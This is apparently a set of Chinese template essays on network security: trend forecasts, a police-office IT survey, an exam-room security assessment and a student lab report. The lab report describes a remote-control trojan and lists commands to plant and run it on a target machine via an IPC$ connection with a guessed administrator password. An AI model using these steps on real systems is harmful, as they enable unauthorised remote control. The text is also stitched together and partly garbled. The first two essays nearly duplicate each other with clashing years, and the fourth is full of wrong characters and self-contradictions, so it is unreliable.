第一篇：網絡信息安全發(fā)展調研報告

1.垃圾郵件和網絡欺騙將立足“社交網絡”

毫無疑問，2009年是社交網站迄今為止受到攻擊最多的一年。但是與2012年相比，這些攻擊可能根本不值一提。Koobface蠕蟲等安全問題對社交網站用戶形成了很大的困擾，但這些惡意軟件仍然是首先感染用戶的電腦，然后再竊取信息。但現(xiàn)在，安全專家則認為，惡意軟件作者將進一步拓展攻擊范圍，把惡意軟件植入到社交網站應用內部。有了這種病毒，無論用戶是否訪問社交網站，黑客都能毫無限制地竊取用戶的資料和登錄密碼。

思科在其2009年《年度安全報告》中揭示了社交媒體（尤其是社交網絡）對網絡安全的影響，并探討了人（而非技術）在為網絡犯罪創(chuàng)造機會方面所起的關鍵作用。社交網絡已經迅速成為網絡犯罪的溫床，因為這些網站的成員過于信任他們社區(qū)的其他成員，沒有采取阻止惡意軟件和計算機病毒的預防措施。小漏洞、不良用戶行為以及過期的安全軟件結合在一起會具有潛在的破壞性，可能大幅增加網絡安全的風險。鑒于以上，2012年社交網絡或許將給我信息安全帶來更多的“驚喜”！

2.云計算成為孕育黑客新的溫床

云計算在2009年取得了長足的發(fā)展，但我們也必須意識到，市場的快速發(fā)展會犧牲一定的安全性。攻擊者今后將把更多的時間用于挖掘云計算服務提供商的ApI（應用編程接口）漏洞。

004km.cn【xiexiebang.com范文網】

毋庸置疑，已經開始有越來越多的IT功能通過云計算來提供，網絡犯罪也順應了這一趨勢。安全廠商Fortinet預計，網絡犯罪借鑒“服務即安 全”（security-as-a-service）的理念，打造“服務即網絡犯罪”（cybercrime-as-a-service）這一特殊品牌。網絡犯罪也將效仿企業(yè)的做法使用基于云計算的工具，以便更有效率地部署遠程攻擊，甚至借此大幅拓展攻擊范圍。

3.大量Mac計算機被病毒感染或黑客入侵

安全廠商Websense安全研究高級經理帕特里克?盧納德（patrick Runald）說：“Mac OS X中沒有任何的惡意軟件防范機制?！彼硎荆贑anSecWest黑客大賽上，Mac已經連續(xù)兩年成為第一個被攻破的系統(tǒng)。

4.智能手機安全問題愈發(fā)嚴重

隨著移動應用的不斷增多，智能設備的受攻擊面也在不斷擴大，移動安全所面臨的局面將會越來越嚴重。雖然我們已經看到了iphone上的蠕蟲病毒，雖然它還不能自我傳播，還得依靠電腦來傳播，但是我們預計，2012年，將會出現(xiàn)真正可以自我傳播的病毒，嚴重威脅iphone和Android等設備。

卡巴斯基實驗室惡意軟件高級研究員羅伊爾?舒文伯格（Roel Schouwenberg）說：“Android手機的日益流行，加之缺乏對第三方應用安全性的有效控制，將導致諸多高調惡意軟件的出現(xiàn)?！?/p>

總體而言，安全專家認為，隨著用戶將智能手機作為迷你pC來處理銀行交易、游戲、社交網站和其他的業(yè)務，黑客將越發(fā)關注這一平臺。

5.搜索引擎成為黑客全新贏利方式

黑客會不斷尋找新的方法借助釣魚網站吸引用戶上鉤，利用搜索引擎優(yōu)化技術展開攻擊便是其中的一種方法。谷歌和必應（Bing）對實時搜索的支持 也將吸引黑客進一步提升相關技術。作為一種攻擊渠道，搜索引擎是非常理想的選擇，因為用戶通常都非常信任搜索引擎，對于排在前幾位的搜索結果更是沒有任何 懷疑，這就給了黑客可乘之機，從而對用戶發(fā)動攻擊。

6.虛擬化普及 安全威脅適應潮流

與Cloud類似的是，虛擬化技術也將抓住快速發(fā)展的時機。業(yè)界中已經有公司開始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障，還能方便協(xié)作，提高效率。

除了瘦客戶機的虛擬桌面以外，企業(yè)還將會開始考察筆記本電腦虛擬機以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機可利用快照迅速恢復到已知的安全狀態(tài)配置，從而為網上銀行或安全的企業(yè)應用提供更高等級的安全保障。工作和休閑可以在同一的硬件上共存，只要相互保持隔離就行。

第二篇：網絡信息安全發(fā)展調研報告

這是一篇關于調研報告的范文，可以提供大家借鑒！

1.垃圾郵件和網絡欺騙將立足“社交網絡”

毫無疑問，2009年是社交網站迄今為止受到攻擊最多的一年。但是與2010年相比，這些攻擊可能根本不值一提。Koobface蠕蟲等安全問題對社交網站用戶形成了很大的困擾，但這些惡意軟件仍然是首先感染用戶的電腦，然后再竊取信息。但現(xiàn)在，安全專家則認為，惡意軟件作者將進一步拓展攻擊范圍，把惡意軟件植入到社交網站應用內部。有了這種病毒，無論用戶是否訪問社交網站，黑客都能毫無限制地竊取用戶的資料和登錄密碼。

思科在其2009年《安全報告》中揭示了社交媒體（尤其是社交網絡）對網絡安全的影響，并探討了人（而非技術）在為網絡犯罪創(chuàng)造機會方面所起的關鍵作用。社交網絡已經迅速成為網絡犯罪的溫床，因為這些網站的成員過于信任他們社區(qū)的其他成員，沒有采取阻止惡意軟件和計算機病毒的預防措施。小漏洞、不良用戶行為以及過期的安全軟件結合在一起會具有潛在的破壞性，可能大幅增加網絡安全的風險。鑒于以上，2010年社交網絡或許將給我信息安全帶來更多的“驚喜”！

2.云計算成為孕育黑客新的溫床

云計算在2009年取得了長足的發(fā)展，但我們也必須意識到，市場的快速發(fā)展會犧牲一定的安全性。攻擊者今后將把更多的時間用于挖掘云計算服務提供商的ApI（應用編程接口）漏洞。

毋庸置疑，已經開始有越來越多的IT功能通過云計算來提供，網絡犯罪也順應了這一趨勢。安全廠商Fortinet預計，網絡犯罪借鑒“服務即安 全”（security-as-a-service）的理念，打造“服務即網絡犯罪”（cybercrime-as-a-service）這一特殊品牌。網絡犯罪也將效仿企業(yè)的做法使用基于云計算的工具，以便更有效率地部署遠程攻擊，甚至借此大幅拓展攻擊范圍。

對于云計算將被黑客所利用這個嚴峻的問題，各大安全公司和技術人員會把精力放在與云計算相關的安全服務上，提供加密、目錄和管理、反垃圾郵件、惡意程序等各種解決方案。據悉，著名安全評測機構VB100號召安全行業(yè)應該聯(lián)合起來，組成一個對抗惡意程序的共同體，分享技術和資源。或許這一提議在2010年能發(fā)展到實質性的階段。

3.大量Mac計算機被病毒感染或黑客入侵

經濟危機非但沒有傷害到蘋果的利益，反而使其業(yè)績進一步提升。但安全專家表示，在市場份額提升的同時，Mac也要面臨更多的黑客攻擊。過去幾年 間，蘋果的pC市場份額已經從10%增長到12%，而且沒有放緩的跡象。與此同時，在售價高于1000美元的筆記本電腦中，蘋果更是占據了90%的份額，但針對iphone（手機上網）和MacBook的攻擊也逐步引發(fā)外界關注。安全專家預計，Mac有可能會成為下一個最易受攻擊的目標。盡管多數攻擊都瞄準Windows，但2012年將會出現(xiàn)更多針對Mac OS X的攻擊。

安全廠商Websense安全研究高級經理帕特里克•盧納德（patrick Runald）說：“Mac OS X中沒有任何的惡意軟件防范機制?！彼硎?，在CanSecWest黑客大賽上，Mac已經連續(xù)兩年成為第一個被攻破的系統(tǒng)。

4.智能手機安全問題愈發(fā)嚴重

隨著移動應用的不斷增多，智能設備的受攻擊面也在不斷擴大，移動安全所面臨的局面將會越來越嚴重。雖然我們已經看到了iphone上的蠕蟲病毒，雖然它還不能自我傳播，還得依靠電腦來傳播，但是我們預計，2012年，將會出現(xiàn)真正可以自我傳播的病毒，嚴重威脅iphone和Android等設備。

卡巴斯基實驗室惡意軟件高級研究員羅伊爾•舒文伯格（Roel Schouwenberg）說：“Android手機的日益流行，加之缺乏對第三方應用安全性的有效控制，將導致諸多高調惡意軟件的出現(xiàn)。”

總體而言，安全專家認為，隨著用戶將智能手機作為迷你pC來處理銀行交易、游戲、社交網站和其他的業(yè)務，黑客將越發(fā)關注這一平臺。

5.搜索引擎成為黑客全新贏利方式

黑客會不斷尋找新的方法借助釣魚網站吸引用戶上鉤，利用搜索引擎優(yōu)化技術展開攻擊便是其中的一種方法。谷歌和必應（Bing）對實時搜索的支持 也將吸引黑客進一步提升相關技術。作為一種攻擊渠道，搜索引擎是非常理想的選擇，因為用戶通常都非常信任搜索引擎，對于排在前幾位的搜索結果更是沒有任何 懷疑，這就給了黑客可乘之機，從而對用戶發(fā)動攻擊。

6.虛擬化普及 安全威脅適應潮流

與Cloud類似的是，虛擬化技術也將抓住快速發(fā)展的時機。業(yè)界中已經有公司開始研究傳統(tǒng)桌面電腦的虛擬化。虛擬化不僅能提供一種極高的安全保障，還能方便協(xié)作，提高效率。

除了瘦客戶機的虛擬桌面以外，企業(yè)還將會開始考察筆記本電腦虛擬機以作為創(chuàng)建安全企業(yè)桌面的手段之一。虛擬機可利用快照迅速恢復到已知的安全狀態(tài)配置，從而為網上銀行或安全的企業(yè)應用提供更高等級的安全保障。工作和休閑可以在同一的硬件上共存，只要相互保持隔離就行。

第三篇：信息安全調研報告

公安基層辦公室信息化調研報告

現(xiàn)代社會的信息化、網絡化和現(xiàn)代通信、計算機互聯(lián)網技術的發(fā)展，對公安機關提出了越來越高的要求。為適應社會形勢發(fā)展的需要，公安部近年來連續(xù)部署了“金盾工程”建設，標志著警務工作信息化工程全面啟動。要適應社會發(fā)展和科技進步的需要，公安機關必須把科技強警工作和公安信息化建設擺在重要的位置。公安辦公室作為“司令部”、“參謀部”，要及時、準確掌握各類情況，為領導決策提供科學依據，必須加強信息化建設。

一、基層公安辦公室信息化是公安信息化的薄弱環(huán)節(jié)

（一）認識上的偏差

部分領導和民警在思想觀念上存在著只須懂法就足以勝任當前公安工作的偏見，對信息化的了解也僅限于信息化就是用微機打字、信息化就是上因特網，對信息化范圍、信息化開展的意義認識不足，沒有真正意識到信息化建設對公安工作有著巨大推動作用。因此，公安機關出現(xiàn)了阻礙科學技術與辦案結合的不利因素，缺乏依靠科技進步的內在動力；對于如何把信息技術運用到公安工作中來、如何用信息化促進公安工作的跨越式發(fā)展，研究較少，重視不夠。這種狀況已成為公安機關加快信息化進程，推動辦公、辦案現(xiàn)代化發(fā)展的瓶頸，與當前形勢發(fā)展和公安工作的任務需求極不相應，也制約了公安工作的發(fā)展。

（二）辦公室基礎設施簡陋導致工作效率的低下

科技強警的鼓敲了幾年，但基層公安局辦公室仍然普遍存在基礎設施簡陋、辦公條件差等現(xiàn)象，辦公室作為綜合部門，工作是多而雜，且有的工作手續(xù)多、所經部門廣，僅僅依靠幾個民警的手工操作或單機辦公，往往使辦公室民警大有力不從心之感，工作效率低下那也是情理之中。因此，針對辦公室的職能作用，建立省人省力的信息化系統(tǒng)，將辦公室人員從材料難寫的困惑中解脫出來，提高工作效率勢在必行。

（三）缺乏人才，使信息化建設力不從心

公安機關信息化建設工作存在最突出的問題，就是嚴重缺乏信息技術人才。從目前來看，公安機關的工作人員在過去所接受的教育中很少涉及信息技術知識，而專門的技術人員又大多為法醫(yī)、會計、痕檢、攝像等傳統(tǒng)技術型工作人員，因此對于信息技術這門科技含量很高的結合技術，顯得束手無策，很難提出一個長遠的發(fā)展規(guī)劃、很難得心應手地組織開展信息化建設。對于有一些信息化建設的單位，又由于人才缺乏，先進的信息化設備不能使用或不能充分發(fā)揮作用，使信息化建設的成果成為擺設。因此在沒有一支高水平的信息化技術人才隊伍的前提下，公安信息化建設對某些單位而言簡直是一種神話或資金上的嚴重浪費。

（四）缺乏資金，信息化建設難以保障

信息化建設是一項高技術、高投入、高效能的現(xiàn)代化基礎建設，必須要有足

夠的建設經費作保證。它所涉及的硬件設備、軟件系統(tǒng)都需要大量的資金來購置。以一個縣公安局辦公室為例，信息化系統(tǒng)需要一個由一臺服務器，10臺終端微機組成的小型局型網，購置網絡辦公系統(tǒng)、數據統(tǒng)計系統(tǒng)，僅此幾項建設資金投入就達幾十萬元。財政卻往往因為各種原因，不能保障和支持公安機關的信息化建設。因此公安機關在信息化建設上只能是等米下鍋，信息化建設得不到有效保障。

二、加強基層公安局辦公室信息化建設的方法

（一）信息化系統(tǒng)的構成公安辦公室信息化系統(tǒng)就是根據信息論、系統(tǒng)論、控制論、現(xiàn)代管理科學理論、現(xiàn)代信息技術，結合辦公室的職能作用和業(yè)務工作特點而建立的信息體系。公安辦公室信息化系統(tǒng)是公安信息系統(tǒng)的子系統(tǒng)，以技術為輔助手段，使公安辦公室獲得快速、靈敏、準確、全面和安全有效的綜合信息支持，實現(xiàn)辦公自動化、科學化、網絡化，以充分發(fā)揮公安辦公室的綜合分析、“參謀”作用。一般來說，根據辦公室的職能作用，基層公安局辦公室信息化系統(tǒng)主要包括以下幾個系統(tǒng)：

1、指揮中心信息處理系統(tǒng)

該系統(tǒng)主要承擔快速、準確、全面獲得的動態(tài)信息，為領導正確決策提供第一手資料，是科學決策、快速指揮調度的重要依據和信息主渠道。指揮中心信息處理系統(tǒng)縱向與上下級公安指揮中心信息網絡連接，橫向以公安信息管理中心為樞紐，整合同級公安犯罪信息中心、交通、戶政、刑偵、出入境、治安等信息系統(tǒng)，運用計算機網絡技術控制手段，將分散的信息統(tǒng)一起來，實現(xiàn)信息資源共享和系統(tǒng)開放，成為覆蓋全局、四通八達的能為各警種、各基層戰(zhàn)斗單位和一線民警提供大量信息的高速通信網，從而克服時空限制支持各警種協(xié)同作戰(zhàn)。

2、公安統(tǒng)計系統(tǒng)

該系統(tǒng)主要依靠統(tǒng)計軟件，進行數據的收集、分類、匯總，有效地進行數據統(tǒng)計和解決統(tǒng)計不實問題，并對下級公安機關進行有力的綜合指導。公安統(tǒng)計系統(tǒng)可通過數據統(tǒng)計，進一步進行社會治安情況分析，為各級部門提供服務。

3、綜合調研系統(tǒng)

該系統(tǒng)主要以科學管理的手段快速、及時、準確地收集各業(yè)務單位、基層機關所得到的成績和經驗，進行系統(tǒng)分析，反映整個公安工作的經驗、成就和業(yè)績。

4、檔案管理系統(tǒng)

該系統(tǒng)主要是通過科學技術手段解決過去查找材料、文件困難，材料保存時間不能過長等問題。檔案管理系統(tǒng)建立后，將文件、材料的文號、文名、存放文柜進行編號，錄入計算機，以便于檢索，并將文件、材料進行掃描存入微機，需要查閱，只需在計算機中進行檢索便可直接查看，同時還可通過局域網，突破時空限制。

5、刑偵、治安、戶政等業(yè)務部門系統(tǒng)

公安辦公室的職能作用決定了其工作具有綜合性的特點，辦公室與刑偵、治安、戶政等業(yè)務部門是相互服務的。因此，辦公室信息系統(tǒng)與刑偵、治安、戶政等業(yè)務部門的網絡連接是必不可少的。刑偵、治安、戶政等業(yè)務部門子系統(tǒng)主要是結合網絡技術手段，進行網上追逃、戶口上網管理，以便進行信息快速流通。如指揮中心信息處理子系統(tǒng)通過業(yè)務部門收集各類業(yè)務數據、不安定情況等；辦公室綜合調研系統(tǒng)通過刑偵部門收集打擊犯罪的情況等；公安統(tǒng)計子系統(tǒng)從戶政收集人口數據等等，都可從各業(yè)務部門子系統(tǒng)網絡上獲得。

（二）辦公室信息化系統(tǒng)的建設

1、組建經濟實用的小型局域網，搭建網絡化辦公平臺，實現(xiàn)信息化系統(tǒng)的職能作用。

2、購置實用的業(yè)務辦公系統(tǒng)軟件，實現(xiàn)辦公自動化。

基層公安辦公室根據實際情況可以自行購買相應的業(yè)務及辦公系統(tǒng)軟件。各基層公安局辦公室要積極爭取政策，引進人才，把技術精、有責任心和熱愛公安事業(yè)的信息技術人才充實到公安機關中來，并努力營造一個適合技術人員發(fā)展的空間，保證信息技術人才進得來、留得住、用得好、有發(fā)展。其次立足本室，在沒有專門人才的情況下，加大全員培訓力度，從實際工作出發(fā)，從實際應用出發(fā)，努力提高全體民警的信息化素質，提高計算機使用水平。

3、建立制度，確保信息化建設發(fā)揮作用。

信息化建設的項目建成以后，不能放著、擺著不用，而要充分地、強制性地利用起來。不能因為民警囿于傳統(tǒng)工作方法，學習掌握上存在惰性，學習掌握需要一段時間，而不做制度上的要求。應從整體發(fā)展的角度、公安事業(yè)發(fā)展的高度，制定規(guī)章制度，要求各類案件信息必須輸入微機、各類公文必須在微機上書寫、流轉，從而使民警從傳統(tǒng)的辦公狀態(tài)進入到網絡化辦公、信息化辦公的角色中，只有這樣才能把信息化建設的成果應用到公安工作中，推動公安工作向前發(fā)展，才真正地將信息化建設落到實處。

第四篇：網絡信息安全評估報告

計算機信息安全評估報告

如何

實

現(xiàn)

如

下

圖

所

示

可用性1.人們通常采用一些技術措施或網絡安全設備來實現(xiàn)這些目標。例如：

使用防火墻，把攻擊者阻擋在網絡外部，讓他們“迚不來”。

即使攻擊者迚入了網絡內部，由于有加密機制，會使他們“改不了”和“拿不走”關 鍵信息和資源。

機密性2機密性將對敏感數據的訪問權限控制在那些經授權的個人，只有他們才能查看數據。機密性可防止向未經授權的個人泄露信息，或防止信息被加工。

如圖所示，“迚不來”和“看不懂”都實現(xiàn)了信息系統(tǒng)的機密性。

人們使用口令對迚入系統(tǒng)的用戶迚行身份鑒別，非法用戶沒有口令就“迚不來”，這就保證了信息系統(tǒng)的機密性。

即使攻擊者破解了口令，而迚入系統(tǒng)，加密機制也會使得他們“看不懂”關鍵信息。例如，甲給乙發(fā)送加密文件，只有乙通過解密才能讀懂其內容，其他人看到的是亂碼。由此便實現(xiàn)了信息的機密性。

完整性3如圖所示，“改不了”和“拿不走”都實現(xiàn)了信息系統(tǒng)的完整性。使用加密機制，可以保證信息系統(tǒng)的完整性，攻擊者無法對加密信息迚行修改或者復制。

不可抵賴性4如圖所示，“跑不掉”就實現(xiàn)了信息系統(tǒng)的不可抵賴性。如果攻擊者迚行了非法操作，系統(tǒng)管理員使用審計機制或簽名機制也可讓他們無所遁形

對考試的機房迚行“管理制度”評估。（1）評估說明

為規(guī)范管理,保障計算機設備的正常運行,創(chuàng)造良好的上機環(huán)境,必須制定相關的管理制度

（2）評估內容

沒有建立相應信息系統(tǒng)運行管理規(guī)程、缺陷管理制度、統(tǒng)計匯報制度、運維流程、值班制度，沒有實行工作票制度；機房出入管理制度上墻，但沒有機房迚出情況記錄（3）評估分析報告

所存在問題：1沒有系統(tǒng)的相關負責人，機房也是誰人都可以自由出入。2在上機過程中做與學習無關的工作。3機房財產規(guī)劃不健全等（4）評估建議

1、計算機室的管理由系統(tǒng)管理員負責，非機房工作人員未經允許不準迚入。未經許可不得擅自上機操作和對運行設備及各種配置迚行更改。

2、保持機房內清潔、安靜，嚴禁機房內吸煙、吐痰以及大聲喧嘩；嚴禁將易燃、易爆、易污染和強磁物品帶入機房。

3、機房內的一切物品，未經管理員同意，不得隨意挪動，拆卸和帶出機房。

4、上機時，應先認真檢查機器情況，如有問題應及時向機房管理員反應。

5、上機人員不得在機房內迚行與上機考試無關的計算機操作。

6、上機時應按規(guī)定操作，故意或因操作不當造成設備損壞，除照價賠償外，視情節(jié)輕重給予處罰。對考試的機房迚行“物理安全”評估。（1）評估說明

防火，防水，防塵，防腐蝕，主機房安裝門禁、監(jiān)控與報警系統(tǒng)。（2）評估內容 主機房沒有安裝門禁、監(jiān)控系統(tǒng)，有消防報警系統(tǒng)。（3）評估分析報告

沒有詳細的機房配線圖，機房供甴系統(tǒng)將動力、照明用甴與計算機系統(tǒng)供甴線路是分開的，機房沒有配備應急照明裝置，有定期對UPS的運行狀況迚行檢測但沒有檢測記錄。

（4）評估建議

有詳細的機房配線圖，機房供甴系統(tǒng)將動力、照明用甴與計算機系統(tǒng)供甴線路分開，機房配備應急照明裝置，定期對UPS的運行狀況迚行檢測（查看半年內檢測記錄）對考試的機房迚行“計算機系統(tǒng)安全”評估。（1）評估說明

應用系統(tǒng)的角色、權限分配有記錄；用戶賬戶的變更、修改、注銷有記錄（半年記錄情況）；關鍵應用系統(tǒng)的數據功能操作迚行審計幵迚行長期存儲；對關鍵應用系統(tǒng)有應急預案；關鍵應用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前迚行安全性測試。

（2）評估內容

營銷系統(tǒng)的角色、權限分配有記錄，其余系統(tǒng)沒有；用戶賬戶的變更、修改、注銷沒有記錄；關鍵應用系統(tǒng)的數據功能操作沒有迚行審計；沒有針對關鍵應用系統(tǒng)的應急預案；關鍵應用系統(tǒng)管理員賬戶、用戶賬戶口令有定期迚行變更；有些新系統(tǒng)上線前沒有迚行過安全性測試。

（3）評估分析報告

網絡中的防火墻位置部署合理，防火墻規(guī)則配置符合安全要求，防火墻規(guī)則配置的建立、更改有規(guī)范申請、審核、審批流程，對防火墻日志迚行存儲、備份。

（4）評估建議

完善系統(tǒng)的角色、權限分配有記錄；記錄用戶賬戶的變更、修改、注銷（半年記錄情況）；關鍵應用系統(tǒng)的數據功能操作迚行審計；制定針對關鍵應用系統(tǒng)的應急預案；關鍵應用系統(tǒng)管理員賬戶、用戶賬戶口令定期迚行變更；新系統(tǒng)上線前應嚴格按照相關標準迚行安全性測試。

對考試的機房迚行“網絡與通信安全”評估。（1）評估說明

按標準部署身份認證系統(tǒng)、安全管理平臺、針對安全設備的日志服務器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風險評估。

（2）評估內容

沒有部署身份認證系統(tǒng)、安全管理平臺，沒有漏洞掃描系統(tǒng)，重要系統(tǒng)沒有迚行信息安全風險評估，沒有部署針對安全設備的日志服務器。

（3）評估分析報告

按標準部署身份認證系統(tǒng)、安全管理平臺、針對安全設備的日志服務器，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年迚行一次信息安全風險評估。

（4）評估建議

部署身份認證系統(tǒng)、安全管理平臺，采用漏洞掃描系統(tǒng)，重要系統(tǒng)一年內迚行信息安全風險評估，部署針對安全設備的日志服務器。

信息安全評估：

對考試的機房迚行“日志與統(tǒng)計安全”評估。（1）評估說明

每天計算機上機記錄日志在冊，對系統(tǒng)迚行不定時的還原。對本局半年內發(fā)生的較大的、或者發(fā)生次數較多的信息安全事件迚行匯總記錄，形成本單位的安全事件列表

（2）評估內容

已成立了信息安全領導機構，但尚未成立信息安全工作機構。

（3）評估分析報告

局域網核心交換設備、城域網核心路由設備應采取設備冗余或準備備用設備，不允許外聯(lián)鏈路繞過防火墻，具有當前準確的網絡拓撲結構圖

（4）評估建議

完善信息安全組織機構，成立信息安全工作機構。

第五篇：【企業(yè)網絡】網絡信息安全報告

XX中型企業(yè)網安全 網絡信息安全報告

一、實驗目的及要求

該專周的目標是讓學生掌握網絡安全的基本框架，網絡安全的基本理論。以及了解計算機網絡安全方面的管理、配置和維護。

本課程要求在理論教學上以必需夠用為原則，應盡量避免過深過繁的理論探討，重在理解網絡安全的基本框架，網絡安全的基本理論。掌握數據加密、防火墻技術、入侵檢測技術以及學習網絡病毒防治。了解Windows 2000的安全、Web的安全、網絡安全工程以及黑客常用的系統(tǒng)攻擊方法。本課程要求學生對計算機的使用有一定了解（了解Windows的使用，具有鍵盤操作和文件處理的基礎），并已經掌握計算機網絡的基本原理。

二、專周內容

1、安全需求分析

（1）網絡安全問題主要集中在對服務器的安全保護、防黑客和病毒、重要網段的保護及管理安全上。因此，我們必須采取相應的安全措施杜絕安全隱患，其中應該做到：

A、公開服務器的安全保護 B、防止黑客從外部攻擊 C、入侵檢測與監(jiān)控 D、病毒防護 E、數據安全保護 F、網絡的安全管理

（2）解決網絡安全問題的一些要求

A、大幅度地提高系統(tǒng)的安全性（重點是可用性和可控性）；

B、保持網絡原有的特點，即對網絡的協(xié)議和傳輸具有良好的透明性，能透明接入，無需更改網絡設置；

C、易于操作、維護，并便于自動化管理，而不增加或少增加附加操作；

D、盡量不影響原網絡拓撲結構，同時便于系統(tǒng)及系統(tǒng)功能的擴展；

E、安全保密系統(tǒng)具有較好的性能價格比。一次性投資，可以長期使用；

F、安全產品具有合法性，及經過國家有關管理部門的認可或認證；

（3）系統(tǒng)安全目標

A、建立一套完整可行的網絡安全與網絡管理策略；

B、將內部網絡、公開服務器網絡和外網進行有效隔離，避免與外部網絡直接通信；

C、建立網站各主機和服務器的安全保護措施，保證他們的系統(tǒng)安全；

D、加強合法用戶的訪問認證，同時將用戶的訪問權限控制在最低限度；

E、全面監(jiān)視對公開服務器的訪問，及時發(fā)現(xiàn)和拒絕不安全的操作和黑客攻擊行為；

F、加強對各種訪問的審計工作，詳細記錄對網絡、公開服務器的訪問行為，形成完整的系統(tǒng)日志；

2、網絡拓撲

3、網絡安全的基本內容

（1）基本網絡命令

A、ping命令： ping –t IP，向指定的計算機不停的發(fā)送數據包，按Ctr+Break快捷鍵可以查看統(tǒng)計信息并繼續(xù)運行，按 Ctr+C可中止運行。

B、Tracert命令：tracert IP 顯示從本地計算機到目標服務器所經過的計算機：

C、pathping pop.pcpop.com 除了顯示路由外，還提供325S的分析，計算丟失包的%

（2）操作系統(tǒng)安全

A、屏蔽不需要的服務組件

開始——程序——管理工具——服務 出現(xiàn)以下窗口：

然后在該對話框中選中需要屏蔽的程序，并單擊右鍵，然后選擇“停止”命令，同時將“啟動類型”設置為“手動”或“已禁用”，這樣就可以對指定的服務組進行屏蔽了。B、關閉默認共享：“開始”——“程序”——“管理工具”——“服務”——“Server”

（3）數據庫系統(tǒng)安全

A、使用安全的帳號策略和Windows認證模式

由于SQL Server不能更改sa用戶名稱，也不能刪除這個超級用戶，所以，我們必須對這個帳號進行最強的保護，當然，包括使用一個非常強壯的密碼，最好不要在數據庫應用中使用sa帳號，只有當沒有其它方法登錄到 SQL Server 實例(例如，當其它系統(tǒng)管理員不可用或忘記了密碼)時才使用 sa?？梢孕陆⒁粋€擁有與sa一樣權限的超級用戶來管理數據庫。安全的帳號策略還包括不要讓管理員權限的帳號泛濫。

SQL Server的認證模式有Windows身份認證和混合身份認證兩種。在任何可能的時候，應該對指向SQL Server的連接要求Windows身份驗證模式。

Windows認證模式比混合模式更優(yōu)越，原因在以下：

1)它通過限制對Microsoft Windows用戶和域用戶帳戶的連接，保護SQL Server免受大部分Internet工具的侵害。

2)服務器將從Windows安全增強機制中獲益，例如更強的身份驗證協(xié)議以及強制的密碼復雜性和過期時間。

3)使用Windows認證，不需要將密碼存放在連接字符串中。存儲密碼是使用標準SQL Server登錄的應用程序的主要漏洞之一。

4)Windows認證意味著你只需要將密碼存放在一個地方。

要在SQL Server的Enterprise Manager安裝Windows身份驗證模式，步驟操作： 展開服務器組——右鍵點擊服務器——然后點擊“屬性”——在安全性選項卡的身份驗證中——點擊“僅限Windows”。（4）網絡防火墻工具：紅墻主機網絡防火墻 安裝

1.具體操作如下：

第一步： 將“愛思紅墻主機網絡防火墻”的安裝光盤插入驅動器，運行根目錄下的Setup文件來運行其安裝程序，進入“愛思紅墻主機網絡防火墻安裝”窗口；

第二步：

在“歡迎安裝愛思紅墻主機網絡防火墻”對話框中，單擊“下一步”按鈕；

第三步： 在“軟件許可協(xié)議”對話框，接受協(xié)議點擊“是”；

第四步： 點擊“是”按鈕，出現(xiàn)顯示您計算機的相關信息，即判斷是否可以安裝本軟件；

第五步： 單擊“下一步”按鈕，出現(xiàn)“選擇目標位置”對話框；

第六步： 在該對話框中，單擊“瀏覽”按鈕，并在“選擇文件夾”對話框中選擇盤符作為驅動器，再指定相應的文件夾及路徑，然后單擊“確定”按鈕；

第七步： 單擊“下一步”按鈕，出現(xiàn)“選擇安裝程序名稱”對話框，您可自定義程序名稱；

第八步： 單擊“下一步”按鈕，系統(tǒng)開始復制文件；

第九步： 進入“紅墻主機網絡防火墻配置”窗口，作出是否運行“紅墻應用程序掃描系統(tǒng)”的選擇后，點擊“完成”。

相關設置：告警設置：系統(tǒng)提供了兩種情況下的告警，即需要系統(tǒng)告警和不需要系統(tǒng)告警，您可據需要選取告警設置。

點擊主界面中的“規(guī)則管理”按鈕，彈出相應窗口，如下圖：

網絡監(jiān)控中心：

（5）網絡攻擊工具：“廣外女生”

它的基本功能有：文件管理方面有上傳，下載，刪除，改名，設置屬性，建立文件夾和運行指定文件等功能；注冊表操作方面：全面模擬WINDOWS的注冊表編輯器，讓遠程注冊表編輯工作有如在本機上操作一樣方便；屏幕控制方面：可以自定義圖片的質量來減少傳輸的時間，在局域網或高網速的地方還可以全屏操作對方的鼠標及鍵盤，就像操縱自己的計算機一樣；遠程任務管理方面，可以直觀地瀏覽對方窗體，隨意殺掉對方窗體或其中的控件；其他功能還有郵件IP通知等。

主要步驟：首先運行“gwg.exe”，出現(xiàn)如圖窗口：

選中“服務端設置”，生成“GDUFS.exe”木馬：

然后將“GDUFS.exe”復制到自己的C盤中，再根據一些命令把“GDUFS.exe”復制到目標主機的盤中，再進行運行。目標主機的IP：191.168.12.38 具體步驟及命令：

“開始”——“運行”——“cmd”

命令：net use 191.168.12.38ipc$ 123 /user:administrator 與目標主機之間建立聯(lián)系

命令：net time 191.168.12.38 獲取目標主機的時間

命令：at 191.168.12.38 08:21 net share c$=c: 與目標主機的C盤建立通道

命令：copy c:GDUFS.exe 191.168.12.38c$ 復制“GDUFS.exe”文件到目標主機的C盤中：

命令：191.168.12.38 10:49 c:GDUFS.exe 指定“GDUFS.exe”在目標主機中什么時候運行。

三、專周小結：

通過這次網絡安全專周，我不僅僅是學到了很多知識，更是透徹的理解到了網絡安全對生活已經將來工作的意義。

網絡安全分為軟件網絡安全和硬件網絡安全。一般我們說的網絡安全就是軟件上的網絡安全，即局域網，互聯(lián)網安全。

網絡安全又分為內網安全和外網安全。在內外網安全中，內網安全則是重中之重。畢竟是家賊難防。據不完全統(tǒng)計，全國因為內網安全的問題，至少每年算是幾億美元。所以，網絡安全特別重要。

至于在將來的工作中，我們也要嚴格尊市網絡設備管理原則和使用秩序，對設備進行統(tǒng)一管理專人負責，嚴格要求自己對設備進行安全操作，保持強烈的責任感和服務意識，做好每一個細節(jié)，重點做好以下幾項工作：

1，及時準確判斷網絡故障，做好上門維護工作或及時提醒網絡合作商進行維護。

2，定期檢查維護各網絡設備的運行情況并進行維護。3，不定期對服務器進行更新和檢查。

4，遇到特殊情況，及時向領導和老師匯報，努力提高應急處理問題和獨立處理問題的能力。

感謝老師對我們的教導。